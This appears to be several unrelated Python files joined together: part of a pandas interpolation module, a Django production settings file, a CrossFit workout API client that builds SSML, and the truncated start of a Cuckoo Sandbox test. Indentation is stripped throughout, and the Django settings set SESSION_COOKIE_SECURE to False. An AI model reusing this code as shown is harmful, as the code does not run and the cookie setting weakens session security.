mask |= arr == x
if na_mask.any():
if mask is None:
mask = isna(arr)
else:
mask |= isna(arr)
# GH 21977
if mask is None:
mask = np.zeros(arr.shape, dtype=bool)
return mask
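# Illustrative: NaN members of values_to_mask are matched via isna, not ==:
#   mask_missing(np.array([1.0, 2.0, np.nan]), [2.0, np.nan])
#   -> array([False, True, True])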
def clean_fill_method(method, allow_nearest=False):
# asfreq is compat for resampling
if method in [None, "asfreq"]:
return None
if isinstance(method, str):
method = method.lower()
if method == "ffill":
method = "pad"
elif method == "bfill":
method = "backfill"
valid_methods = ["pad", "backfill"]
expecting = "pad (ffill) or backfill (bfill)"
if allow_nearest:
valid_methods.append("nearest")
expecting = "pad (ffill), backfill (bfill) or nearest"
if method not in valid_methods:
msg = "Invalid fill method. Expecting {expecting}. Got {method}".format(
expecting=expecting, method=method
)
raise ValueError(msg)
return method
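# Illustrative:
#   clean_fill_method('ffill')   -> 'pad'
#   clean_fill_method('bfill')   -> 'backfill'
#   clean_fill_method('nearest') raises ValueError unless allow_nearest=True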
def clean_interp_method(method, **kwargs):
order = kwargs.get("order")
valid = [
"linear",
"time",
"index",
"values",
"nearest",
"zero",
"slinear",
"quadratic",
"cubic",
"barycentric",
"polynomial",
"krogh",
"piecewise_polynomial",
"pchip",
"akima",
"spline",
"from_derivatives",
]
if method in ("spline", "polynomial") and order is None:
raise ValueError("You must specify the order of the spline or " "polynomial.")
if method not in valid:
raise ValueError(
"method must be one of {valid}. Got '{method}' "
"instead.".format(valid=valid, method=method)
)
return method
def interpolate_1d(
xvalues,
yvalues,
method="linear",
limit=None,
limit_direction="forward",
limit_area=None,
fill_value=None,
bounds_error=False,
order=None,
**kwargs
):
"""
Logic for the 1-d interpolation. The result should be 1-d, inputs
xvalues and yvalues will each be 1-d arrays of the same length.
bounds_error is currently hardcoded to False since the non-scipy
interpolation methods do not accept it as an argument.
"""
# Treat the original, non-scipy methods first.
invalid = isna(yvalues)
valid = ~invalid
if not valid.any():
# have to call np.asarray(xvalues) since xvalues could be an Index
# which can't be mutated
result = np.empty_like(np.asarray(xvalues), dtype=np.float64)
result.fill(np.nan)
return result
if valid.all():
return yvalues
if method == "time":
if not getattr(xvalues, "is_all_dates", None):
# if not issubclass(xvalues.dtype.type, np.datetime64):
raise ValueError(
"time-weighted interpolation only works "
"on Series or DataFrames with a "
"DatetimeIndex"
)
method = "values"
valid_limit_directions = ["forward", "backward", "both"]
limit_direction = limit_direction.lower()
if limit_direction not in valid_limit_directions:
msg = "Invalid limit_direction: expecting one of {valid!r}, " "got {invalid!r}."
raise ValueError(
msg.format(valid=valid_limit_directions, invalid=limit_direction)
)
if limit_area is not None:
valid_limit_areas = ["inside", "outside"]
limit_area = limit_area.lower()
if limit_area not in valid_limit_areas:
raise ValueError(
"Invalid limit_area: expecting one of {}, got "
"{}.".format(valid_limit_areas, limit_area)
)
# default limit is unlimited GH #16282
if limit is None:
# limit = len(xvalues)
pass
elif not is_integer(limit):
raise ValueError("Limit must be an integer")
elif limit < 1:
raise ValueError("Limit must be greater than 0")
from pandas import Series
ys = Series(yvalues)
# These are sets of index pointers to invalid values... i.e. {0, 1, etc...
all_nans = set(np.flatnonzero(invalid))
start_nans = set(range(ys.first_valid_index()))
end_nans = set(range(1 + ys.last_valid_index(), len(valid)))
mid_nans = all_nans - start_nans - end_nans
# Like the sets above, preserve_nans contains indices of invalid values,
# but in this case, it is the final set of indices that need to be
# preserved as NaN after the interpolation.
# For example if limit_direction='forward' then preserve_nans will
# contain indices of NaNs at the beginning of the series, and NaNs that
# are more than 'limit' away from the prior non-NaN.
# set preserve_nans based on direction using _interp_limit
if limit_direction == "forward":
preserve_nans = start_nans | set(_interp_limit(invalid, limit, 0))
elif limit_direction == "backward":
preserve_nans = end_nans | set(_interp_limit(invalid, 0, limit))
else:
# both directions... just use _interp_limit
preserve_nans = set(_interp_limit(invalid, limit, limit))
# if limit_area is set, add either mid or outside indices
# to preserve_nans GH #16284
if limit_area == "inside":
# preserve NaNs on the outside
preserve_nans |= start_nans | end_nans
elif limit_area == "outside":
# preserve NaNs on the inside
preserve_nans |= mid_nans
# sort preserve_nans and convert to list
preserve_nans = sorted(preserve_nans)
xvalues = getattr(xvalues, "values", xvalues)
yvalues = getattr(yvalues, "values", yvalues)
result = yvalues.copy()
if method in ["linear", "time", "index", "values"]:
if method in ("values", "index"):
inds = np.asarray(xvalues)
# hack for DatetimeIndex, #1646
if needs_i8_conversion(inds.dtype.type):
inds = inds.view(np.int64)
if inds.dtype == np.object_:
inds = lib.maybe_convert_objects(inds)
else:
inds = xvalues
result[invalid] = np.interp(inds[invalid], inds[valid], yvalues[valid])
result[preserve_nans] = np.nan
return result
sp_methods = [
"nearest",
"zero",
"slinear",
"quadratic",
"cubic",
"barycentric",
"krogh",
"spline",
"polynomial",
"from_derivatives",
"piecewise_polynomial",
"pchip",
"akima",
]
if method in sp_methods:
inds = np.asarray(xvalues)
# hack for DatetimeIndex, #1646
if issubclass(inds.dtype.type, np.datetime64):
inds = inds.view(np.int64)
result[invalid] = _interpolate_scipy_wrapper(
inds[valid],
yvalues[valid],
inds[invalid],
method=method,
fill_value=fill_value,
bounds_error=bounds_error,
order=order,
**kwargs
)
result[preserve_nans] = np.nan
return result
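# Illustrative (float ndarray with NaNs): with limit=1 and the default
# forward direction, leading NaNs are preserved and at most one
# consecutive NaN is filled:
#   x = np.arange(5.0)
#   y = np.array([np.nan, 1.0, np.nan, np.nan, 4.0])
#   interpolate_1d(x, y, method='linear', limit=1)
#   -> array([nan, 1., 2., nan, 4.])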
def _interpolate_scipy_wrapper(
x, y, new_x, method, fill_value=None, bounds_error=False, order=None, **kwargs
):
"""
Passed off to scipy.interpolate.interp1d. method is scipy's kind.
Returns an array interpolated at new_x. Add any new methods to
the list in clean_interp_method.
"""
extra = "{method} interpolation requires SciPy.".format(method=method)
import_optional_dependency("scipy", extra=extra)
from scipy import interpolate
new_x = np.asarray(new_x)
# ignores some kwargs that could be passed along.
alt_methods = {
"barycentric": interpolate.barycentric_interpolate,
"krogh": interpolate.krogh_interpolate,
"from_derivatives": _from_derivatives,
"piecewise_polynomial": _from_derivatives,
}
if getattr(x, "is_all_dates", False):
# GH 5975, scipy.interp1d can't handle datetime64s
x, new_x = x._values.astype("i8"), new_x.astype("i8")
if method == "pchip":
try:
alt_methods["pchip"] = interpolate.pchip_interpolate
except AttributeError:
raise ImportError(
"Your version of Scipy does not support " "PCHIP interpolation."
)
elif method == "akima":
alt_methods["akima"] = _akima_interpolate
interp1d_methods = [
"nearest",
"zero",
"slinear",
"quadratic",
"cubic",
"polynomial",
]
if method in interp1d_methods:
if method == "polynomial":
method = order
terp = interpolate.interp1d(
x, y, kind=method, fill_value=fill_value, bounds_error=bounds_error
)
new_y = terp(new_x)
elif method == "spline":
# GH #10633, #24014
if isna(order) or (order <= 0):
raise ValueError(
"order needs to be specified and greater than 0; "
"got order: {}".format(order)
)
terp = interpolate.UnivariateSpline(x, y, k=order, **kwargs)
new_y = terp(new_x)
else:
# GH 7295: need to be able to write for some reason
# in some circumstances: check all three
if not x.flags.writeable:
x = x.copy()
if not y.flags.writeable:
y = y.copy()
if not new_x.flags.writeable:
new_x = new_x.copy()
method = alt_methods[method]
new_y = method(x, y, new_x, **kwargs)
return new_y
def _from_derivatives(xi, yi, x, order=None, der=0, extrapolate=False):
"""
Convenience function for interpolate.BPoly.from_derivatives.
Construct a piecewise polynomial in the Bernstein basis, compatible
with the specified values and derivatives at breakpoints.
Parameters
----------
xi : array_like
sorted 1D array of x-coordinates
yi : array_like or list of array-likes
yi[i][j] is the j-th derivative known at xi[i]
order: None or int or array_like of ints. Default: None.
Specifies the degree of local polynomials. If not None, some
derivatives are ignored.
der : int or list
How many derivatives to extract; None for all potentially nonzero
derivatives (that is a number equal to the number of points), or a
list of derivatives to extract. This number includes the function
value as 0th derivative.
extrapolate : bool, optional
Whether to extrapolate to out-of-bounds points based on first and last
intervals, or to return NaNs. Default: False.
See Also
--------
scipy.interpolate.BPoly.from_derivatives
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R.
"""
from scipy import interpolate
# return the method for compat with scipy version & backwards compat
method = interpolate.BPoly.from_derivatives
m = method(xi, yi.reshape(-1, 1), orders=order, extrapolate=extrapolate)
return m(x)
def _akima_interpolate(xi, yi, x, der=0, axis=0):
"""
Convenience function for akima interpolation.
xi and yi are arrays of values used to approximate some function f,
with ``yi = f(xi)``.
See `Akima1DInterpolator` for details.
Parameters
----------
xi : array_like
A sorted list of x-coordinates, of length N.
yi : array_like
A 1-D array of real values. `yi`'s length along the interpolation
axis must be equal to the length of `xi`. If N-D array, use axis
parameter to select correct axis.
x : scalar or array_like
Of length M.
der : int or list, optional
How many derivatives to extract; None for all potentially
nonzero derivatives (that is a number equal to the number
of points), or a list of derivatives to extract. This number
includes the function value as 0th derivative.
axis : int, optional
Axis in the yi array corresponding to the x-coordinate values.
See Also
--------
scipy.interpolate.Akima1DInterpolator
Returns
-------
y : scalar or array_like
The result, of length R or length M or M by R.
"""
from scipy import interpolate
P = interpolate.Akima1DInterpolator(xi, yi, axis=axis)
if der == 0:
return P(x)
elif interpolate._isscalar(der):
return P(x, der=der)
else:
return [P(x, nu) for nu in der]
def interpolate_2d(
values, method="pad", axis=0, limit=None, fill_value=None, dtype=None
):
"""
Perform an actual interpolation of values; values will be made 2-d if
needed. Fills inplace, returns the result.
"""
transf = (lambda x: x) if axis == 0 else (lambda x: x.T)
# reshape a 1 dim if needed
ndim = values.ndim
if values.ndim == 1:
if axis != 0: # pragma: no cover
raise AssertionError("cannot interpolate on a ndim == 1 with " "axis != 0")
values = values.reshape(tuple((1,) + values.shape))
if fill_value is None:
mask = None
else: # todo create faster fill func without masking
mask = mask_missing(transf(values), fill_value)
method = clean_fill_method(method)
if method == "pad":
values = transf(pad_2d(transf(values), limit=limit, mask=mask, dtype=dtype))
else:
values = transf(
backfill_2d(transf(values), limit=limit, mask=mask, dtype=dtype)
)
# reshape back
if ndim == 1:
values = values[0]
return values
def _cast_values_for_fillna(values, dtype):
"""
Cast values to a dtype that algos.pad and algos.backfill can handle.
"""
# TODO: for int-dtypes we make a copy, but for everything else this
# alters the values in-place. Is this intentional?
if (
is_datetime64_dtype(dtype)
or is_datetime64tz_dtype(dtype)
or is_timedelta64_dtype(dtype)
):
values = values.view(np.int64)
elif is_integer_dtype(values):
# NB: this check needs to come after the datetime64 check above
values = ensure_float64(values)
return values
def _fillna_prep(values, mask=None, dtype=None):
# boilerplate for pad_1d, backfill_1d, pad_2d, backfill_2d
if dtype is None:
dtype = values.dtype
if mask is None:
# This needs to occur before datetime/timedeltas are cast to int64
mask = isna(values)
values = _cast_values_for_fillna(values, dtype)
mask = mask.view(np.uint8)
return values, mask
def pad_1d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
algos.pad_inplace(values, mask, limit=limit)
return values
def backfill_1d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
algos.backfill_inplace(values, mask, limit=limit)
return values
def pad_2d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
if np.all(values.shape):
algos.pad_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
def backfill_2d(values, limit=None, mask=None, dtype=None):
values, mask = _fillna_prep(values, mask, dtype)
if np.all(values.shape):
algos.backfill_2d_inplace(values, mask, limit=limit)
else:
# for test coverage
pass
return values
_fill_methods = {"pad": pad_1d, "backfill": backfill_1d}
def get_fill_func(method):
method = clean_fill_method(method)
return _fill_methods[method]
def clean_reindex_fill_method(method):
return clean_fill_method(method, allow_nearest=True)
def _interp_limit(invalid, fw_limit, bw_limit):
"""
Get indexers of values that won't be filled
because they exceed the limits.
Parameters
----------
invalid : boolean ndarray
fw_limit : int or None
forward limit to index
bw_limit : int or None
backward limit to index
Returns
-------
set of indexers
Notes
-----
This is equivalent to the more readable, but slower
.. code-block:: python
def _interp_limit(invalid, fw_limit, bw_limit):
for x in np.where(invalid)[0]:
if invalid[max(0, x - fw_limit):x + bw_limit + 1].all():
yield x
"""
# handle forward first; the backward direction is the same except
# 1. operate on the reversed array
# 2. subtract the returned indices from N - 1
N = len(invalid)
f_idx = set()
b_idx = set()
def inner(invalid, limit):
limit = min(limit, N)
windowed = _rolling_window(invalid, limit + 1).all(1)
idx = set(np.where(windowed)[0] + limit) | set(
np.where((~invalid[: limit + 1]).cumsum() == 0)[0]
)
return idx
if fw_limit is not None:
if fw_limit == 0:
f_idx = set(np.where(invalid)[0])
else:
f_idx = inner(invalid, fw_limit)
if bw_limit is not None:
if bw_limit == 0:
# then we don't even need to care about backwards
# just use forwards
return f_idx
else:
b_idx = list(inner(invalid[::-1], bw_limit))
b_idx = set(N - 1 - np.asarray(b_idx))
if fw_limit == 0:
return b_idx
return f_idx & b_idx
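# Illustrative: with three consecutive NaNs and a limit of 1 in each
# direction, only the middle index is beyond both limits:
#   _interp_limit(np.array([False, True, True, True, False]), 1, 1) -> {2}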
def _rolling_window(a, window):
"""
[True, True, False, True, False], 2 ->
[
[True, True],
[True, False],
[False, True],
[True, False],
]
"""
# https://stackoverflow.com/a/6811241
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
|
|
# -*- coding: utf-8 -*-
'''
Production Configurations
- Use djangosecure
- Use Amazon's S3 for storing static files and uploaded media
- Use mailgun to send emails
- Use Redis on Heroku
'''
from __future__ import absolute_import, unicode_literals
from django.utils import six
from .common import * # noqa
# SECRET CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Raises ImproperlyConfigured exception if DJANGO_SECRET_KEY not in os.environ
SECRET_KEY = env("DJANGO_SECRET_KEY")
# This ensures that Django will be able to detect a secure connection
# properly on Heroku.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# django-secure
# ------------------------------------------------------------------------------
INSTALLED_APPS += ("djangosecure", )
SECURITY_MIDDLEWARE = (
'djangosecure.middleware.SecurityMiddleware',
)
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
MIDDLEWARE_CLASSES = SECURITY_MIDDLEWARE + MIDDLEWARE_CLASSES
# set this to 60 seconds and then to 518400 when you can prove it works
SECURE_HSTS_SECONDS = 60
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True)
SECURE_FRAME_DENY = env.bool("DJANGO_SECURE_FRAME_DENY", default=True)
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True)
SECURE_BROWSER_XSS_FILTER = True
SESSION_COOKIE_SECURE = False
SESSION_COOKIE_HTTPONLY = True
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# SITE CONFIGURATION
# ------------------------------------------------------------------------------
# Hosts/domain names that are valid for this site
# See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list('DJANGO_ALLOWED_HOSTS', default=['permabots.com'])
# END SITE CONFIGURATION
INSTALLED_APPS += ("gunicorn", )
# STORAGE CONFIGURATION
# ------------------------------------------------------------------------------
# Uploaded Media Files
# ------------------------
# See: http://django-storages.readthedocs.org/en/latest/index.html
INSTALLED_APPS += (
'storages',
)
AWS_ACCESS_KEY_ID = env('DJANGO_AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = env('DJANGO_AWS_SECRET_ACCESS_KEY')
AWS_STORAGE_BUCKET_NAME = env('DJANGO_AWS_STORAGE_BUCKET_NAME')
AWS_QUERYSTRING_AUTH = False
AWS_IS_GZIPPED = True
# AWS cache settings, don't change unless you know what you're doing:
AWS_EXPIRY = 60 * 60 * 24 * 7
# TODO See: https://github.com/jschneier/django-storages/issues/47
# Revert the following and use str after the above-mentioned bug is fixed in
# either django-storage-redux or boto
AWS_HEADERS = {
'Cache-Control': six.b('max-age=%d, s-maxage=%d, must-revalidate' % (
AWS_EXPIRY, AWS_EXPIRY))
}
# URL that handles the media served from MEDIA_ROOT, used for managing
# stored files.
from storages.backends.s3boto import S3BotoStorage # noqa
StaticRootS3BotoStorage = lambda: S3BotoStorage(location='static')
MediaRootS3BotoStorage = lambda: S3BotoStorage(location='media')
DEFAULT_FILE_STORAGE = 'config.settings.production.MediaRootS3BotoStorage'
MEDIA_URL = 'https://%s.s3.amazonaws.com/media/' % AWS_STORAGE_BUCKET_NAME
# Static Assets
# ------------------------
STATIC_URL = 'https://%s.s3.amazonaws.com/static/' % AWS_STORAGE_BUCKET_NAME
STATICFILES_STORAGE = 'config.settings.production.StaticRootS3BotoStorage'
# See: https://github.com/antonagestam/collectfast
# For Django 1.7+, 'collectfast' should come before
# 'django.contrib.staticfiles'
AWS_PRELOAD_METADATA = True
INSTALLED_APPS = ('collectfast', ) + INSTALLED_APPS
# EMAIL
# ------------------------------------------------------------------------------
DEFAULT_FROM_EMAIL = env('DJANGO_DEFAULT_FROM_EMAIL',
default='permabots <noreply@permabots.com>')
EMAIL_BACKEND = 'django_mailgun.MailgunBackend'
MAILGUN_ACCESS_KEY = env('DJANGO_MAILGUN_API_KEY')
MAILGUN_SERVER_NAME = env('DJANGO_MAILGUN_SERVER_NAME')
EMAIL_SUBJECT_PREFIX = env("DJANGO_EMAIL_SUBJECT_PREFIX", default='[permabots] ')
SERVER_EMAIL = env('DJANGO_SERVER_EMAIL', default=DEFAULT_FROM_EMAIL)
NEW_RELIC_LICENSE_KEY = env('NEW_RELIC_LICENSE_KEY')
NEW_RELIC_APP_NAME = env('NEW_RELIC_APP_NAME')
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See:
# https://docs.djangoproject.com/en/dev/ref/templates/api/#django.template.loaders.cached.Loader
TEMPLATES[0]['OPTIONS']['loaders'] = [
('django.template.loaders.cached.Loader', [
'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', ]),
]
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
DATABASES['default'] = env.db("DATABASE_URL")
# CACHING
# ------------------------------------------------------------------------------
# Heroku URL does not pass the DB number, so we parse it in
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "{0}/{1}".format(env('REDIS_URL', default="redis://127.0.0.1:6379"), 0),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"IGNORE_EXCEPTIONS": True, # mimics memcache behavior.
# http://niwinz.github.io/django-redis/latest/#_memcached_exceptions_behavior
}
}
}
# LOGGING CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s '
'%(process)d %(thread)d %(message)s'
},
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose',
},
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True
},
'django.security.DisallowedHost': {
'level': 'ERROR',
'handlers': ['console', 'mail_admins'],
'propagate': True
},
'permabots': {
    # console logs at DEBUG; mail_admins only emails ERRORs (handler level)
    'handlers': ['console', 'mail_admins'],
    'level': 'DEBUG',
    'propagate': True,
},
}
}
# Custom Admin URL, use {% url 'admin:index' %}
ADMIN_URL = env('DJANGO_ADMIN_URL')
# Your production stuff: Below this line define 3rd party library settings
|
|
from urllib.request import urlopen
from urllib.parse import urlencode
from urllib.error import HTTPError
import json
import logging
from datetime import datetime, date as Date
import sys
import re
from typing import List, Iterator, Tuple, Optional
from . import env
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.DEBUG)
URL = 'http://www.elliottbaycrossfit.com/api/v1/wods?'
# Timestamp format for the API's `date`/`publishDate` fields (an assumption
# based on payloads like '2017-06-01T00:00:00.000Z'; %f round-trips them).
EBCF_API_TSTAMP_FMT = '%Y-%m-%dT%H:%M:%S.%fZ'
def _is_announcement_line(line: str) -> bool:
"""
Is a line of text considered an announcement line?
Examples:
HAPPY BIRTHDAY <person>!!!!
NO CLASSES <>
:param line: line to check
:return: if the line matches an expected pattern
"""
return bool(line) and (line.upper() == line or line.endswith('!!'))
def _split_announcement_and_strength(strength_raw: Optional[str]) -> Tuple[List[str], List[str]]:
"""
Split the strength section into 2 sections: announcements and the actual
strength training workout.
Rohan sometimes starts the description of the strength training
section with an announcement, like wishing someone happy birthday
or announcing that a class is canceled.
:param strength_raw: The raw strength text from the API
:return: 2-tuple with the strength and announcements split by line
"""
if strength_raw is None:
return [], []
strength_raw = strength_raw.strip()
if not strength_raw:
return [], []
announcement = []
lines = [l.strip() for l in strength_raw.splitlines(False)]
# while we have lines to parse (whole strength can be an announcement)
# and the line is an announcement line or empty line (multiple announcements
# can be split by an empty line)
while lines and (_is_announcement_line(lines[0]) or not lines[0]):
announcement.append(lines.pop(0))
return announcement, lines
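# Illustrative: an all-caps line (and any blank line after it) is peeled off
# as the announcement; the rest is the strength work:
#   _split_announcement_and_strength('HAPPY BIRTHDAY SAM!!\n\nBack Squat 5x5')
#   -> (['HAPPY BIRTHDAY SAM!!', ''], ['Back Squat 5x5'])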
def _get_conditioning(conditioning_raw: Optional[str]) -> List[str]:
"""safely gets the conditioning part of the workout"""
if conditioning_raw is None:
return []
return conditioning_raw.strip().splitlines(False)
class WOD(object):
"""
Class representing a WOD from the EBCF API.
"""
def __init__(self, wod_attributes: dict):
    # keep the raw API fields so `as_wod_attributes` can round-trip them
    self.strength_raw = wod_attributes.get('strength', '')
    self.conditioning_raw = wod_attributes.get('conditioning', '')
    self.announcement_lines, self.strength_lines = _split_announcement_and_strength(
        self.strength_raw
    )
    self.conditioning_lines = _get_conditioning(self.conditioning_raw)
    self.image = wod_attributes.get('image', None)
    self.datetime = _safe_datetime(wod_attributes.get('date'))
    self.date = None
    if self.datetime:
        self.date = self.datetime.date()
    self.publish_datetime = _safe_datetime(wod_attributes.get('publishDate'))
def has_content(self) -> bool:
return bool(self.announcement_lines or self.conditioning_lines or self.strength_lines)
def announcement_ssml(self) -> str:
if self.announcement_lines:
ssml_chunks = ['<p>Announcement:']
for line in self.announcement_lines:
line = line.strip()
if line:
ssml_chunks.append('<s>{}</s>'.format(_clean_illegal_ssml_chars(line)))
else:
ssml_chunks.append('<break time="500ms"/>')
ssml_chunks.append('</p>')
return ''.join(ssml_chunks)
return ''
def announcement_pprint(self) -> str:
if self.announcement_lines:
return 'Announcement:\n' + '\n'.join(self.announcement_lines)
return ''
def strength_ssml(self) -> str:
if self.strength_lines:
return _convert_ssml(self.strength_lines, 'Strength Section:')
return ''
def strength_pprint(self) -> str:
if self.strength_lines:
return 'Strength:\n' + '\n'.join(self.strength_lines)
return ''
def conditioning_ssml(self) -> str:
if self.conditioning_lines:
return _convert_ssml(self.conditioning_lines, 'Conditioning:')
return ''
def conditioning_pprint(self) -> str:
if self.conditioning_lines:
return 'Conditioning:\n' + '\n'.join(self.conditioning_lines)
return ''
def full_ssml(self) -> str:
return self.announcement_ssml() + self.strength_ssml() + self.conditioning_ssml()
def pprint(self) -> str:
return '\n'.join([
self.announcement_pprint(),
self.strength_pprint(),
self.conditioning_pprint()
])
    def as_wod_attributes(self) -> dict:
        # The raw API strings are not stored on the instance, so rebuild them
        # from the split line lists; guard against missing datetimes.
        return {
            'strength': '\n'.join(self.announcement_lines + self.strength_lines),
            'conditioning': '\n'.join(self.conditioning_lines),
            'image': self.image,
            'date': self.datetime.strftime(EBCF_API_TSTAMP_FMT) if self.datetime else None,
            'publishDate': self.publish_datetime.strftime(EBCF_API_TSTAMP_FMT) if self.publish_datetime else None
        }
class APIParseError(ValueError):
"""Thrown when the underlying expectations of the API stop working."""
def _urlencode_multilevel(obj: dict) -> str:
"""
EBCF uses PHP-style query args that support nested dictionaries.
E.g. we need to typically pass the following args to the API:
filter[simple][date]:2017-06-01T00:00:00.000Z
filter[simple][enabled]:True
and these need to be encoded.
"""
flattened_params = {}
def _flatten_obj(obj, parent_key):
sub_params = {}
if isinstance(obj, dict):
for child_key in obj:
encode_key = '{}[{}]'.format(parent_key, child_key)
sub_params[encode_key] = obj[child_key]
elif isinstance(obj, list):
for i, val in enumerate(obj):
encode_key = '{}[{}]'.format(parent_key, i)
sub_params[encode_key] = val
else:
flattened_params[parent_key] = obj
for k, v in sub_params.items():
_flatten_obj(v, k)
if isinstance(obj, dict):
for k, v in obj.items():
_flatten_obj(v, k)
return urlencode(flattened_params)
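# Worked example (editor's sketch): nested dicts flatten into PHP-style keys.
# >>> _urlencode_multilevel({'filter': {'simple': {'enabled': True}}})
# 'filter%5Bsimple%5D%5Benabled%5D=True'
# which decodes to: filter[simple][enabled]=True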
def _call_api(params: dict) -> dict:
LOG.debug('EBCF API params: %s', params)
query_url = URL + _urlencode_multilevel(params)
LOG.debug('HTTP GET %s', query_url)
try:
with urlopen(query_url) as f:
return json.load(f)
except HTTPError as http_error:
if http_error.code == 401:
# indicates that the wod is not yet released AFAIK
return {}
else:
raise
def _parse_wod_response(api_response: dict) -> Iterator[WOD]:
LOG.debug('EBCF API response: %s', api_response)
wod_list = api_response.get('data', [])
for wod_data in wod_list:
try:
wod = WOD(wod_data['attributes'])
if wod.has_content():
yield wod
except KeyError:
continue
EBCF_RANGE_STRF_FMT = '%Y-%m-%dT%H:%M:%S%z'
def get_wods_by_range(start_date: datetime, end_date: datetime) -> List[WOD]:
"""
Gets the WOD by publishDate range.
:param start_date: Start day
:param end_date: End day
:return: WOD
:rtype: WOD
"""
params = {'filter': {'simple': {
'publishDate': {
'$gt': start_date.strftime(EBCF_RANGE_STRF_FMT),
'$lt': end_date.strftime(EBCF_RANGE_STRF_FMT)
},
'enabled': True
}}}
return list(_parse_wod_response(_call_api(params)))
def get_wod(date: Date) -> Optional[WOD]:
    """
    Gets the WOD for a specific day.
    :param datetime.date date: the date
    :returns: WOD data, or None if not found
    :rtype: Optional[WOD]
    """
params = {'filter': {'simple': {
'date': date.strftime('%Y-%m-%d') + 'T00:00:00.000Z',
'enabled': True
}}}
for wod in _parse_wod_response(_call_api(params)):
if wod.date == date:
return wod
_ALIASES = {
r'OH': r'<sub alias="overhead">OH</sub>',
r'DB': r'<sub alias="dumbbell">DB</sub>',
r'KB': r'<sub alias="kettlebell">KB</sub>',
r'EMOM': r'every minute on the minute',
r'E(\d)MOM': r'every \1 minutes on the minute',
r'HSPU': r'hand stand push ups',
r'#': r'<sub alias="pounds">#</sub>',
r'(\d+)"': r'\1<sub alias="inches">"</sub>',
r'(\d+)\'': r'\1<sub alias="feet">\'</sub>',
r'&': 'and',
r'(\d+) [Ss]ec\.? ': r'\1 second ',
r'\bT2B\b': r'<sub alias="toes to bar">T2B</sub>', # T2B => toes 2 bar
r'( ?)\bx ?(\b\d+\b)': r'\1times \2', # 'x3' or ' x 3' => times 3
r' \+ ': '<break strength="strong"/> + ', # slow down between plusses
}
def _inject_aliases(text: str) -> str:
for key, replacement in _ALIASES.items():
text = re.sub(key, replacement, text)
return text
def _fix_sets(text: str) -> str:
return re.sub(r'(\d+)x(\d+)', r'\1 sets of \2', text)
def _fix_rx(text: str) -> str:
return re.sub(r'(\d+[#"\'])/(\d+[#"\'])', r'<prosody rate="fast">\1 male, \2 female</prosody>', text)
def _clean_illegal_ssml_chars(text: str) -> str:
return text.replace('&', 'and')
def _massage_for_tts(text: str) -> str:
text = _fix_sets(text)
text = _fix_rx(text)
text = _inject_aliases(text)
return text
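# Example transformations (editor's sketch; inputs invented):
# >>> _massage_for_tts('5x5')
# '5 sets of 5'
# >>> _massage_for_tts('EMOM 10')
# 'every minute on the minute 10'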
def _convert_ssml(lines: List[str], section: str) -> str:
section = '<p>%s</p>' % section
new_lines = [
'<s>{}</s>'.format(_massage_for_tts(l))
for l in lines
]
return section + ''.join(new_lines)
EBCF_API_TSTAMP_FMT = '%Y-%m-%dT%H:%M:%S.000Z'
def _safe_datetime(datestr: str) -> Optional[datetime]:
    """Tries to convert a timestamp into a datetime object, without crashing.
    :param datestr: date string
    :returns: datetime object set to UTC, or None
    """
if not datestr:
return None
try:
return env.UTC.localize(datetime.strptime(datestr, EBCF_API_TSTAMP_FMT))
except ValueError:
return None
def _test(argv: List[str]) -> None:
logging.basicConfig(format='%(levelname)s %(filename)s-%(funcName)s-%(lineno)d: %(message)s', level=logging.DEBUG)
try:
date = datetime.strptime(argv[1], '%Y-%m-%d').date()
except IndexError:
print('Must give me a date in format: YYYY-MM-DD')
sys.exit(1)
wod = get_wod(date)
if wod:
print(wod.pprint())
print('SSML:')
print(wod.full_ssml())
    else:
        print('No WOD found for {}'.format(date))
if __name__ == '__main__':
_test(sys.argv)
|
|
# Copyright (C) 2012-2013 Claudio Guarnieri.
# Copyright (C) 2014-2018 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import os
import pytest
import re
import tempfile
from cuckoo.common.files import Files
from cuckoo.common.objects import (
